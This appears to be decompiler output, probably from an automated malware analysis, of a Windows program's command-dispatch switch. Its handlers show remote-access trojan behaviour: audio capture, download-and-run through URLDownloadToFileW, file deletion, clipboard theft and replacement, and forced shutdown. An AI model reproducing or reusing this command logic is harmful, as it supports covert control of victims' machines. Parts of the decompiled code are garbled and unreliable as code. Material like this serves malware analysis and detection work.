                    							__ecx =  &_v480;
                    							__ecx = E00401E65( &_v480, __edx, __ebp, __eflags, 3);
                    							__eax = E00401FAB(__ecx);
                    							__eax = E0043B4A1(__ecx, __eax);
                    							__eflags = __eax;
                    							__eax = __eax & 0xffffff00 | __eflags != 0x00000000;
                    							__ecx =  &_v484;
                    							__eax = __al & 0x000000ff;
                    							_push(__al & 0x000000ff);
                    							__ecx = E00401E65( &_v484, __edx, __ebp, __eflags, 1);
                    							__eax = E00401FAB(__ecx);
                    							_push(__eax);
                    							__ecx = __edi;
                    							__eax = E004183D1(__edi, __edx, __eflags);
                    							goto L10;
                    						case 0xe:
                    							__ecx =  &_v432;
                    							__eax = E0041AE15( &_v432, __edx);
                    							__esp = __esp - 0x18;
                    							__eax =  &_v432;
                    							__ecx = __esp;
                    							__eax = E004020F6(__ebx, __esp, __edx, __eflags,  &_v432);
                    							_push(0x11);
                    							__ecx = 0x474580; // executed
                    							__eax = E00404AA1(0x474580, __edx, __eflags); // executed
                    							goto L10;
                    						case 0xf:
                    							__ecx =  &_v444;
                    							__eax = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__esp = __esp - 0x18;
                    							__ecx = __esp;
                    							__eax = E004020F6(__ebx, __esp, __edx, __eflags, __eax);
                    							__ecx = 0x4740d8;
                    							__eax = E00409DCA(0x4740d8, __edx);
                    							goto L143;
                    						case 0x10:
                    							__ecx = 0x4740d8;
                    							__eax = E0040AD63(0x4740d8, __edx);
                    							goto L143;
                    						case 0x11:
                    							__ecx = 0x4740d8;
                    							__eax = E0040AEC6(__ebx, 0x4740d8, __edx);
                    							goto L143;
                    						case 0x12:
                    							__ecx =  &_v444;
                    							__eax = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__ecx = 0x474170;
                    							__eax = E00401FC0(0x474170, __eax);
                    							__ecx = 0x4740d8;
                    							goto L55;
                    						case 0x13:
                    							 *0x471b34 =  &( *0x471b34->i);
                    							__eflags =  *0x471b34;
                    							__eflags = __eax;
                    							__ecx =  &_v444;
                    							__eax = E00401E65( &_v444, __edx, __ebp, __eflags, 1);
                    							__esp = __esp - 0x18;
                    							__ecx = __esp;
                    							__eax = E004020F6(__ebx, __esp, __edx, __eflags, __eax);
                    							__ecx =  &_v452;
                    							__eax = E00401E65( &_v452, __edx, __ebp, __eflags, 0);
                    							__esp = __esp - 0x18;
                    							__ecx = __esp;
                    							__eax = E004020F6(__ebx, __esp, __edx, __eflags, __eax);
                    							__ecx = 0x4740d8;
                    							__eax = E0040A908(__ebx, 0x4740d8, __edx, __eflags);
                    							goto L58;
                    						case 0x14:
                    							__esi = 0x4740d8;
                    							__ecx = 0x4740d8;
                    							__eax = E0040B6DE(0x4740d8);
                    							__ecx = 0x4740d8;
                    							L55:
                    							__eax = E0040A7B6(__ebx, __ecx);
                    							goto L143;
                    						case 0x15:
                    							__eflags =  *0x471b1a - __bl;
                    							asm("sbb eax, 0x471b1a");
                    							if(__eflags == 0) {
                    								__edx = 0;
                    								__cl = 0;
                    								__eax = E0040BFD7(0);
                    							}
                    							goto L143;
                    						case 0x16:
                    							__ebx = 0;
                    							__ecx =  &_v444;
                    							__eax = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__edi = 0x473e30;
                    							__ecx = 0x473e30;
                    							__eax = E00401FC0(0x473e30, __eax);
                    							__esi = 0x473e48;
                    							__ecx = 0x473e48;
                    							__eax = E0040482D(0x473e48);
                    							__ecx = 0x473e48;
                    							__eax = E004048C8(0x473e48, 0x473e48, 0x473e48);
                    							__esp = __esp - 0x18;
                    							__ecx = __esp;
                    							_push(0x473e30);
                    							__eflags =  *0x471aba - __bl; // 0x0
                    							if(__eflags == 0) {
                    								__eax = E004020F6(0, __ecx, __edx, __eflags);
                    							} else {
                    								__eax = E004020F6(0, __ecx, __edx, __eflags);
                    							}
                    							__ecx = __esi;
                    							__eax = E00404AA1(__esi, __edx, __eflags);
                    							_push(__ebx);
                    							_push(0x404421);
                    							goto L142;
                    						case 0x17:
                    							__eax =  *0x471ad0();
                    							__ecx = 0x473e48;
                    							__eax = E00404E26(__edx);
                    							goto L143;
                    						case 0x18:
                    							__ebx = 0;
                    							__ecx =  &_v444;
                    							 *0x471a84 = __bl;
                    							__eax = E00401E65( &_v444, __edx, __ebp, __eflags, 3);
                    							__esp = __esp - 0x18;
                    							__ecx = __esp;
                    							__eax = E004020F6(0, __esp, __edx, __eflags, __eax);
                    							__ecx =  &_v452;
                    							__ecx = E00401E65( &_v452, __edx, __ebp, __eflags, 2);
                    							E00401FAB(__ecx) = E0043B4A1(__ecx, __eax);
                    							__ecx =  &_v456;
                    							__ecx = E00401E65( &_v456, __edx, __ebp, __eflags, 1);
                    							__eax = E00401FAB(__ecx);
                    							__eax = E0043B4A1(__ecx, __eax);
                    							__ecx =  &_v460;
                    							__esi = __eax;
                    							__ecx = E00401E65( &_v460, __edx, __ebp, __eflags, 0);
                    							__eax = E00401FAB(__ecx);
                    							__eax = E0043B4A1(__ecx, __eax);
                    							__edx = __esi;
                    							__ecx = __eax;
                    							__eax = E0040170F(__ecx, __edx, __edi, __esi, __ebp, __eax);
                    							goto L143;
                    						case 0x19:
                    							 *0x471a84 = 1;
                    							waveInStop( *0x471ac8) = waveInClose( *0x471ac8);
                    							goto L143;
                    						case 0x1a:
                    							 *0x471b34 =  &( *0x471b34->i);
                    							__eflags =  *0x471b34;
                    							__eax = __eax + 0x471b34;
                    							__ecx =  &_v444;
                    							__eax = E00401E65( &_v444, __edx, __ebp, __eflags, 1);
                    							__esp = __esp - 0x18;
                    							__ecx = __esp;
                    							__eax = E004020F6(__ebx, __esp, __edx, __eflags, __eax);
                    							__ecx =  &_v452;
                    							__eax = E00401E65( &_v452, __edx, __ebp, __eflags, 0);
                    							__esp = __esp - 0x18;
                    							__ecx = __esp;
                    							__eax = E00412733(__ebx, __edx);
                    							__esp = __esp + 0x30;
                    							L58:
                    							 *0x471b34 =  *0x471b34 - 1;
                    							goto L143;
                    						case 0x1b:
                    							__ecx =  &_v444;
                    							__ecx = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							E00401FAB(__ecx) = DeleteFileW(__eax);
                    							goto L143;
                    						case 0x1c:
                    							__eax = E00412659();
                    							ExitProcess(0);
                    						case 0x1d:
                    							while(1) {
                    								__eflags =  *0x471b34 - __ebx;
                    								if( *0x471b34 == __ebx) {
                    									break;
                    								}
                    								Sleep(0x64);
                    							}
                    							asm("clc");
                    							__eax->i = __eax->i | __al;
                    							_t123 = __edx + 0x64;
                    							 *_t123 =  *(__edx + 0x64) + __ch;
                    							__eflags =  *_t123;
                    							E0040CE9F();
                    							__esi = __esi - 1;
                    							asm("arpl di, di");
                    							goto ( *((intOrPtr*)(__esi - 0x70)));
                    						case 0x1e:
                    							__eax = E0040D608(__ebx, __eflags);
                    							goto L143;
                    						case 0x1f:
                    							while(1) {
                    								__eflags =  *0x471b34 - __ebx; // 0x0
                    								if(__eflags == 0) {
                    									break;
                    								}
                    								Sleep(0x64);
                    							}
                    							__ebx = 0;
                    							__ecx =  &_v444;
                    							__ecx = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__eax = E00401FAB(__eax);
                    							__ecx =  &_v448;
                    							__esi = __eax;
                    							__ecx = E00401E65( &_v448, __edx, __ebp, __eflags, 1);
                    							__eax = E00401FAB(__eax);
                    							__ecx =  &_v440;
                    							__eax = E0040D83D( &_v440, __edx, __eax);
                    							_push(0);
                    							_push(0);
                    							__ecx =  &_v440;
                    							_push(E00401F04( &_v440));
                    							__ecx =  &_v452;
                    							__ecx = E00401E65( &_v452, __edx, __ebp, __eflags, 2);
                    							__eax = E00401FAB(__eax);
                    							_push(__eax);
                    							_push(0);
                    							__imp__URLDownloadToFileW();
                    							__eflags = __eax;
                    							if(__eflags == 0) {
                    								__esp = __esp - 0x18;
                    								__eax =  &_v452;
                    								__ecx = __esp;
                    								E00408F83(0, __esp, __edx, __eflags,  &_v452) = E0040D229(__edx);
                    								__esp = __esp + 0x18;
                    							}
                    							goto L20;
                    						case 0x20:
                    							__ecx =  &_v260;
                    							__eax = E004046F7( &_v260, __ebp, 1);
                    							__ecx =  &_v264;
                    							__eax = E004048C8( &_v264, __esi,  &_v264);
                    							__esp = __esp - 0x18;
                    							__ecx = __esp;
                    							__eax = E00402093(__ebx, __esp, __edx, __ebp, 0x465094);
                    							_push(0x25);
                    							__ecx =  &_v272;
                    							__eax = E00404AA1( &_v272, __edx, __eflags);
                    							__ecx =  &_v300;
                    							__eax = E00404C10( &_v300, __edx, E0040DA49, 0);
                    							__ecx =  &_v308;
                    							__eax = E00404EE2(__ebx, __ecx, __edx, __esi);
                    							goto L143;
                    						case 0x21:
                    							__ecx =  &_v444;
                    							__ecx = E00401E65( &_v444, __edx, __ebp, __eflags, 2);
                    							__eax = E00401FAB(__ecx);
                    							__eax = __eax + 0x10000;
                    							__ecx =  &_v448;
                    							__ecx = E00401E65( &_v448, __edx, __ebp, __eflags, 1);
                    							__eax = E00401FAB(__eax);
                    							__ebx = 0;
                    							__ecx =  &_v452;
                    							__ecx = E00401E65( &_v452, __edx, __ebp, __eflags, 0);
                    							__eax = E00401FAB(__eax);
                    							__eax = MessageBoxW(0, __eax, __eax, __eax);
                    							__ecx =  &_v456;
                    							__esi = __eax;
                    							__eax = E00401E65( &_v456, __edx, __ebp, __eflags, 0);
                    							__esp = __esp - 0x18;
                    							__ecx =  &_v392;
                    							__edi = __esp;
                    							__edx = __esi;
                    							__edx = E0041B623(0,  &_v392, __esi);
                    							__ecx =  &_v416;
                    							__edx = __eax;
                    							__ecx = __edi;
                    							__eax = E00402F10(0, __edi, __edx, __ebp, __eflags, __eax);
                    							_push(0x26);
                    							L24:
                    							__ecx = 0x474580;
                    							__eax = E00404AA1(0x474580, __edx, __eflags);
                    							__ecx =  &_v428;
                    							__eax = E00401FD8();
                    							__ecx =  &_v404;
                    							goto L11;
                    						case 0x22:
                    							__eax = E004173E7();
                    							__ebx = 0;
                    							__ecx =  &_v444;
                    							__eax = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__edx = "0";
                    							__ecx = __eax;
                    							__eax = E00405B05(__edx);
                    							__ecx =  &_v448;
                    							_push(0);
                    							__eflags = __al;
                    							if(__eflags == 0) {
                    								__eax = E00401E65( &_v448, __edx, __ebp, __eflags);
                    								__edx = "1";
                    								__ecx = __eax;
                    								__eax = E00405B05(__edx);
                    								__ecx =  &_v448;
                    								_push(0);
                    								__eflags = __al;
                    								if(__eflags == 0) {
                    									__eax = E00401E65( &_v448, __edx, __ebp, __eflags);
                    									__edx = "2";
                    									__ecx = __eax;
                    									__eax = E00405B05(__edx);
                    									__eflags = __al;
                    									if(__eflags == 0) {
                    										__eax = LoadLibraryA("PowrProf.dll");
                    										__eax = GetProcAddress(__eax, "SetSuspendState");
                    										__ecx =  &_v444;
                    										__esi = __eax;
                    										__eax = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    										__edx = "3";
                    										__ecx = __eax;
                    										__eax = E00405B05(__edx);
                    										_push(0);
                    										__eflags = __al;
                    										if(__eflags == 0) {
                    											__ecx =  &_v444;
                    											__eax = E00401E65( &_v444, __edx, __ebp, __eflags);
                    											__edx = "4";
                    											__ecx = __eax;
                    											__eax = E00405B05(__edx);
                    											__eflags = __al;
                    											if(__al != 0) {
                    												_push(0);
                    												_push(0);
                    												_push(1);
                    												goto L94;
                    											}
                    										} else {
                    											_push(0);
                    											_push(0);
                    											L94:
                    											__eax =  *__esi();
                    										}
                    									} else {
                    										_push(0);
                    										__ecx =  &_v444;
                    										__ecx = E00401E65( &_v444, __edx, __ebp, __eflags, 1);
                    										__eax = E00401FAB(__ecx);
                    										__eax = E0043B4A1(__ecx, __eax);
                    										__eax = __eax | 0x00000002;
                    										__eflags = __eax;
                    										goto L89;
                    									}
                    								} else {
                    									__ecx = E00401E65( &_v448, __edx, __ebp, __eflags, 1);
                    									__eax = E00401FAB(__ecx);
                    									__eax = E0043B4A1(__ecx, __eax);
                    									__eax = __eax | 0x00000001;
                    									goto L89;
                    								}
                    							} else {
                    								__ecx = E00401E65( &_v448, __edx, __ebp, __eflags, 1);
                    								__eax = E00401FAB(__ecx);
                    								__eax = E0043B4A1(__ecx, __eax);
                    								L89:
                    								_pop(__ecx);
                    								__eax = ExitWindowsEx(__eax, ??);
                    							}
                    							goto L143;
                    						case 0x23:
                    							L100:
                    							__eax = OpenClipboard(__ebx);
                    							__eflags = __eax;
                    							if(__eax != 0) {
                    								__esi = GetClipboardData(0xd);
                    								__edi = GlobalLock(__esi);
                    								GlobalUnlock(__esi) = CloseClipboard();
                    								__eflags = __edi;
                    								0x46b928 =  !=  ? __edi : 0x46b928;
                    								__ecx =  &_v432;
                    								__eax = E0040417E(__ebx,  &_v432, __edx, __ebp,  !=  ? __edi : 0x46b928);
                    								__esp = __esp - 0x18;
                    								__edx =  &_v436;
                    								__ecx = __esp;
                    								__eax = E0041B7B3(__ebx, __esp, __edx);
                    								_push(0x6b);
                    								__ecx = 0x474580;
                    								__eax = E00404AA1(0x474580, __edx, __eflags);
                    								goto L20;
                    							}
                    							goto L143;
                    						case 0x24:
                    							__eflags = OpenClipboard(0);
                    							if(__eflags != 0) {
                    								__eax = EmptyClipboard();
                    								__ecx =  &_v444;
                    								__ecx = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    								__eax = E0040247C();
                    								__eax =  &(__eax->i);
                    								__edi = __eax;
                    								__eax = GlobalLock(__edi);
                    								__ecx =  &_v448;
                    								__esi = __eax;
                    								__ecx = E00401E65( &_v448, __edx, __ebp, __eflags, 0);
                    								__eax = E0040247C();
                    								__ecx =  &_v452;
                    								__ecx = E00401E65( &_v452, __edx, __ebp, __eflags, 0);
                    								GlobalUnlock(__edi) = SetClipboardData(0xd, __edi);
                    								goto L99;
                    							}
                    							goto L143;
                    						case 0x25:
                    							__eax = OpenClipboard(0);
                    							__eflags = __eax;
                    							if(__eax != 0) {
                    								__eax = EmptyClipboard();
                    								L99:
                    								__eax = CloseClipboard();
                    								goto L100;
                    							}
                    							goto L143;
                    						case 0x26:
                    							__ebx = 0;
                    							__ecx =  &_v444;
                    							__ecx = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__eax = E0040247C();
                    							__ecx =  &_v448;
                    							__esi = __eax;
                    							__ecx = E00401E65( &_v448, __edx, __ebp, __eflags, 0);
                    							__eax = E00401FAB(__eax);
                    							__edx = __esi;
                    							__ecx = __eax;
                    							__eax = E00411AFB();
                    							goto L143;
                    						case 0x27:
                    							__eax =  &_v404;
                    							__ebx = 0;
                    							__ecx =  &_v444;
                    							_v404 = 0;
                    							_v408 = 0;
                    							__ecx = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__eax = E00401FAB(__eax);
                    							__edx =  &_v412;
                    							__ecx = __eax;
                    							__eax = E0041B48B(__eax, __edx,  &_v404);
                    							__eflags = __eax - 1;
                    							if(__eax == 1) {
                    								__edx = _v404;
                    								__ecx = _v408;
                    								E00411AFB() = L0043B710(_v408);
                    							}
                    							goto L143;
                    						case 0x28:
                    							__eax = E0040C06F(__ebx, __edx, __eflags);
                    							goto L143;
                    						case 0x29:
                    							__ecx =  &_v444;
                    							__eax = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__esp = __esp - 0x18;
                    							__ecx = __esp;
                    							__eax = E0041772F(__ebx, __edx, __esi, __ebp);
                    							goto L14;
                    						case 0x2a:
                    							__ecx =  &_v444;
                    							__eax = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__esp = __esp - 0x18;
                    							__ecx = __esp;
                    							__eax = E00414092(__ebx, __edx, __esi, __ebp);
                    							goto L14;
                    						case 0x2b:
                    							__ecx =  &_v444;
                    							__eax = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__esp = __esp - 0x18;
                    							__ecx = __esp;
                    							__eax = E0040542F(__ebx, __edx, __esi, __ebp, __eflags);
                    							goto L14;
                    						case 0x2c:
                    							_push(__ecx);
                    							__esi = 0x474320;
                    							__ecx = 0x474320;
                    							__eax = E0040247C();
                    							__ecx = 0x474320;
                    							__eax = E00401FAB(0x474320);
                    							__ebx = 0;
                    							__ecx =  &_v444;
                    							__ecx = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							E0040247C() =  &(__eax->i);
                    							__ecx =  &_v448;
                    							__ecx = E00401E65( &_v448, __edx, __ebp, __eflags, 0);
                    							__eax = E00401FAB(__eax);
                    							__ecx = 0x4742d8;
                    							__edx = E00401FAB(0x4742d8);
                    							__eax = E004134F5(__edx, __eflags, "name", __eax, __eax, __eax, __eax);
                    							goto L14;
                    						case 0x2d:
                    							__ecx =  &_v444;
                    							__eax = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__esp = __esp - 0x18;
                    							__ecx = __esp;
                    							__eax = E004112A7(__ebx, __edx, __esi, __ebp, __eflags);
                    							goto L14;
                    						case 0x2e:
                    							__ecx =  &_v444;
                    							__eax = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__esp = __esp - 0x18;
                    							__ecx = __esp;
                    							__eax = E00419CAD(__ebx, __edx);
                    							goto L14;
                    						case 0x2f:
                    							__ecx =  &_v260;
                    							__eax = E00416D51( &_v260);
                    							__ecx =  &_v444;
                    							__ecx = E00401E65( &_v444, __edx, __ebp, __eflags, 2);
                    							__eax = E00401FAB(__ecx);
                    							_v348 = __eax;
                    							__eax =  &_v264;
                    							_v344 =  &_v264;
                    							 &_v348 = E00417442(__ebx, __edx, __edi, __ebp, __eflags,  &_v348);
                    							__eax = E0040994B();
                    							__ecx =  &_v452;
                    							_t46 = __eax - 1; // -1
                    							__esi = _t46;
                    							__eax = E00401E65( &_v452, __edx, __ebp, __eflags, 3);
                    							__esp = __esp - 0x18;
                    							__ecx = __esp;
                    							__eax = E004020F6(__ebx, __esp, __edx, __eflags, __eax);
                    							__ecx =  &_v460;
                    							__eax = E00401E65( &_v460, __edx, __ebp, __eflags, 2);
                    							__esp = __esp - 0x18;
                    							__ecx = __esp;
                    							__eax = E004020F6(__ebx, __esp, __edx, __eflags, __eax);
                    							__ecx =  &_v468;
                    							__ecx = E00401E65( &_v468, __edx, __ebp, __eflags, 1);
                    							__eax = E00401FAB(__eax);
                    							__esp = __esp - 0x18;
                    							__ecx = __esp;
                    							__eax = E0040417E(__ebx, __esp, __edx, __ebp, __eax);
                    							__ecx =  &_v476;
                    							__ecx = E00401E65( &_v476, __edx, __ebp, __eflags, 0);
                    							__eax = E00401FAB(__eax);
                    							__esp = __esp - 0x18;
                    							__ecx = __esp;
                    							__eax = E0040417E(__ebx, __esp, __edx, __ebp, __eax);
                    							__ecx =  &_v300;
                    							__eax = E0040917A(__ecx, __edx, __eflags);
                    							__eflags = _v396 - __bl;
                    							if(_v396 == __bl) {
                    								 &_v404 =  &_v408;
                    								__ecx = E0040995F(__ecx,  &_v408);
                    								 &_v348 = E004098FB( &_v348, _v348);
                    							}
                    							__ecx =  &_v260;
                    							__eax = E004098CF();
                    							goto L143;
                    						case 0x30:
                    							__ecx =  &_v444;
                    							__ecx = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__eax = E00401FAB(__ecx);
                    							__ecx = __eax;
                    							__eax = E00409874(__ecx);
                    							goto L143;
                    						case 0x31:
                    							__ecx =  &_v444;
                    							__ecx = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__eax = E00401FAB(__eax);
                    							__eax = StrToIntA(__eax);
                    							__ecx =  &_v448;
                    							__edi = __eax;
                    							__ecx = E00401E65( &_v448, __edx, __ebp, __eflags, 1);
                    							__eax = E00401FAB(__eax);
                    							__ecx =  &_v440;
                    							__eax = E0040D83D( &_v440, __edx, __eax);
                    							__ecx =  &_v440;
                    							__eax = E00401F04( &_v440);
                    							__ecx =  &_v452;
                    							__esi = __eax;
                    							__eax = E00401E65( &_v452, __edx, __ebp, __eflags, 2);
                    							__edx = __esi;
                    							__ecx = __eax;
                    							__eax = E0041BF87(__eax, __esi);
                    							__ecx =  &_v444;
                    							__edx = E00401F04( &_v444);
                    							__ecx = __edi;
                    							__eax = E0041C477(__edi, __edx);
                    							L20:
                    							__ecx =  &_v452;
                    							L21:
                    							__eax = E00401F09();
                    							goto L143;
                    						case 0x32:
                    							__ecx =  &_v444;
                    							__ecx = E00401E65( &_v444, __edx, __ebp, __eflags, 1);
                    							__eax = E00401FAB(__eax);
                    							__ecx =  &_v448;
                    							__ecx = E00401E65( &_v448, __edx, __ebp, __eflags, 0);
                    							__eax = E00401FAB(__ecx);
                    							__eax = SetWindowTextW(__eax, __eax);
                    							goto L36;
                    						case 0x33:
                    							__ebx = 0;
                    							__ecx =  &_v444;
                    							__eax = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__edx = "0";
                    							__ecx = __eax;
                    							__eax = E00405B05(__edx);
                    							__ecx =  &_v448;
                    							_push(0);
                    							__eflags = __al;
                    							if(__eflags == 0) {
                    								__eax = E00401E65( &_v448, __edx, __ebp, __eflags);
                    								__esp = __esp - 0x18;
                    								__ecx = __esp;
                    								__eax = E004020F6(0, __esp, __edx, __eflags, __eax);
                    								__ecx = 0x474578;
                    							} else {
                    								__eax = E00401E65( &_v448, __edx, __ebp, __eflags);
                    								__esp = __esp - 0x18;
                    								__ecx = __esp;
                    								__eax = E004020F6(0, __esp, __edx, __eflags, __eax);
                    								__ecx = 0x471d62;
                    							}
                    							__eax = E00416D62(__ebx, __ecx, __edx);
                    							goto L143;
                    						case 0x34:
                    							__ecx =  &_v444;
                    							__eax = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__esp = __esp - 0x18;
                    							__ecx = __esp;
                    							__eax = E00416F2A(__ecx, __edx, __edi, __eflags);
                    							goto L14;
                    						case 0x35:
                    							__ecx =  &_v444;
                    							__eax = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__esp = __esp - 0x18;
                    							__ecx = __esp;
                    							__eax = E00407A70(__ebx, __edx);
                    							goto L14;
                    						case 0x36:
                    							__ecx =  &_v444;
                    							__eax = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__esp = __esp - 0x18;
                    							__ecx = __esp;
                    							__eax = E00419542(__ebx, __edx, __esi, __ebp);
                    							goto L14;
                    						case 0x37:
                    							__ecx =  &_v444;
                    							__eax = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__esp = __esp - 0x18;
                    							__ecx = __esp;
                    							__eax = E00403F28(__ebx, __edx, __esi, __ebp, __eflags);
                    							L14:
                    							__esp = __esp + 0x18;
                    							goto L143;
                    						case 0x38:
                    							__eax = E0041A7AC(__ebx);
                    							goto L143;
                    						case 0x39:
                    							__eax = E0041A8CB(__ebx, __eflags);
                    							goto L143;
                    						case 0x3a:
                    							__eax = E0041A90A(__eax);
                    							goto L143;
                    						case 0x3b:
                    							__ebx = 0;
                    							__ecx =  &_v444;
                    							__ecx = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__eax = E004051E3(0);
                    							__ecx =  &_v452;
                    							__eflags = __eax->i - __bl;
                    							__ebx = 0 | __eflags != 0x00000000;
                    							__ecx = E00401E65( &_v452, __edx, __ebp, __eflags, 1);
                    							__eax = E0041A8AA(__ecx, __edx, __esi);
                    							goto L143;
                    						case 0x3c:
                    							__eax = E0041A912(__edx);
                    							goto L143;
                    						case 0x3d:
                    							__eflags =  *0x4709d0 - 1;
                    							__eflags = __eax - 0x4709d0;
                    							_t180 =  &_a61;
                    							 *_t180 = _a61 + __esi;
                    							__eflags =  *_t180;
                    						case 0x3e:
                    							__eflags =  *0x471d48 - __bl;
                    							asm("sbb eax, 0x471d48");
                    							if(__eflags != 0) {
                    								ShowWindow( *0x473b1c, 9) = SetForegroundWindow( *0x473b1c);
                    							} else {
                    								__cl = 1;
                    								__eax = E0041C7B9(__ebx, __ecx, __edx, __edi);
                    								__ebx = 0;
                    								__eax = CreateThread(0, 0, E0041CE7B, 0, 0, 0);
                    								 *0x471d48 = 2;
                    							}
                    							goto L143;
                    						case 0x3f:
                    							_push(5);
                    							L30:
                    							_push(0);
                    							goto L31;
                    						case 0x40:
                    							__ebx = 0;
                    							_push(0);
                    							_push(0);
                    							L31:
                    							__ecx =  &_v444;
                    							__ecx = E00401E65( &_v444, __edx, __ebp, __eflags);
                    							__eax = E00401FAB(__ecx);
                    							__eax = ShowWindow(__eax, ??);
                    							goto L143;
                    						case 0x41:
                    							__ecx =  &_v260;
                    							__eax = E00408A8B( &_v260);
                    							__ecx =  &_v444;
                    							__eax = E00401E65( &_v444, __edx, __ebp, __eflags, 2);
                    							__esp = __esp - 0x18;
                    							__ecx = __esp;
                    							__eax = E004020F6(__ebx, __esp, __edx, __eflags, __eax);
                    							__ecx =  &_v452;
                    							__eax = E00401E65( &_v452, __edx, __ebp, __eflags, 1);
                    							__esp = __esp - 0x18;
                    							__ecx = __esp;
                    							__eax = E004020F6(__ebx, __esp, __edx, __eflags, __eax);
                    							__ecx =  &_v460;
                    							__eax = E00401E65( &_v460, __edx, __ebp, __eflags, 0);
                    							__esp = __esp - 0x18;
                    							__ecx = __esp;
                    							__eax = E004020F6(__ebx, __esp, __edx, __eflags, __eax);
                    							__ecx =  &_v284;
                    							__eax = E00406D2E(__ebx,  &_v284, __edx);
                    							__ecx =  &_v356;
                    							__eax = E00408A99();
                    							goto L143;
                    						case 0x42:
                    							_push(1);
                    							__ecx =  &_v444;
                    							__ecx = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__eax = E00401FAB(__eax);
                    							__esp = __esp - 0x18;
                    							__ecx = __esp;
                    							__eax = E00402093(__ebx, __esp, __edx, __ebp, __eax);
                    							_push("hlight");
                    							__ecx = 0x4742d8;
                    							__edx = E00401FAB(0x4742d8);
                    							__eax = E0041331D(0x4742d8, __edx);
                    							__esp = __esp + 0x20;
                    							goto L143;
                    						case 0x43:
                    							__ecx =  &_v432;
                    							__eax = E004063BE(__ebx,  &_v432, __eflags);
                    							__ecx =  &_v444;
                    							__eax = E00401E65( &_v444, __edx, __ebp, __eflags, 1);
                    							__ecx =  &_v448;
                    							__edx = E00401E65( &_v448, __edx, __ebp, __eflags, 0);
                    							__ecx =  &_v384;
                    							__edx = __eax;
                    							__ecx =  &_v408;
                    							__edx = __eax;
                    							__ecx =  &_v440;
                    							__eax = E0040678D( &_v440, __edx, __eflags);
                    							__ecx =  &_v408;
                    							__eax = E00401FD8();
                    							__ecx =  &_v384;
                    							goto L137;
                    						case 0x44:
                    							__ecx =  &_v444;
                    							__ecx = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__eax = E00401FAB(__ecx);
                    							__ecx = __eax;
                    							__eax = E0041B59E(__ecx);
                    							goto L143;
                    						case 0x45:
                    							__ecx =  &_v444;
                    							__ecx = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__eax = E00401FAB(__ecx);
                    							__ecx = __eax;
                    							__eax = E0041B5CA(__ecx);
                    							goto L143;
                    						case 0x46:
                    							__ecx =  &_v432;
                    							__eax = E004020DF(__ebx,  &_v432);
                    							__ecx =  &_v444;
                    							__ecx = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__eax = E00401FAB(__eax);
                    							__edx =  &_v436;
                    							__ecx = __eax;
                    							__eax = E0041BF1A(__edx);
                    							__esp = __esp - 0x18;
                    							__eax =  &_v436;
                    							__esi = __esp;
                    							__ecx =  &_v448;
                    							_push( &_v436);
                    							_push(0x473ec8);
                    							_push(E00401E65( &_v448, __edx, __ebp, __eflags, 2));
                    							__ecx =  &_v452;
                    							__edx = E00401E65( &_v452, __edx, __ebp, __eflags, 1);
                    							__ecx =  &_v344;
                    							__eax = E00402F31( &_v344, __eax, __ebp, __edi);
                    							goto L139;
                    						case 0x47:
                    							__ecx =  &_v444;
                    							__ecx = E00401E65( &_v444, __edx, __ebp, __eflags, 1);
                    							__eax = E00401FAB(__eax);
                    							__ecx =  &_v448;
                    							__esi = __eax;
                    							__eax = E00401E65( &_v448, __edx, __ebp, __eflags, 2);
                    							__edx = __esi;
                    							__ecx = __eax;
                    							__eax = E0041BF87(__eax, __edx);
                    							__ecx =  &_v440;
                    							__eax = E004020DF(__ebx,  &_v440);
                    							__ecx =  &_v452;
                    							__ecx = E00401E65( &_v452, __edx, __ebp, __eflags, 1);
                    							__eax = E00401FAB(__eax);
                    							__edx =  &_v444;
                    							__ecx = __eax;
                    							__eax = E0041BF1A(__edx);
                    							__esp = __esp - 0x18;
                    							__eax =  &_v444;
                    							__esi = __esp;
                    							__ecx =  &_v456;
                    							_push( &_v444);
                    							_push(0x473ec8);
                    							_push(E00401E65( &_v456, __edx, __ebp, __eflags, 0));
                    							__edx = "0";
                    							__ecx =  &_v348;
                    							__eax = E0040531E( &_v348, "0", __ebp, __edi);
                    							L139:
                    							_pop(__ecx);
                    							__edx = __eax;
                    							__ecx =  &_v376;
                    							__eax = E00402F10(__ebx,  &_v376, __eax, __ebp, __eflags);
                    							_pop(__ecx);
                    							__edx = __eax;
                    							__ecx =  &_v400;
                    							__eax = E00402F10(__ebx,  &_v400, __eax, __ebp, __eflags);
                    							_pop(__ecx);
                    							__edx = __eax;
                    							__ecx = __esi;
                    							__eax = E00402F10(__ebx, __esi, __edx, __ebp, __eflags);
                    							_pop(__ecx);
                    							_push(0xca);
                    							__ecx = 0x474580;
                    							__eax = E00404AA1(0x474580, __edx, __eflags);
                    							__ecx =  &_v428;
                    							__eax = E00401FD8();
                    							__ecx =  &_v404;
                    							__eax = E00401FD8();
                    							__ecx =  &_v360;
                    							L137:
                    							__eax = E00401FD8();
                    							L10:
                    							__ecx =  &_v468;
                    							L11:
                    							__eax = E00401FD8();
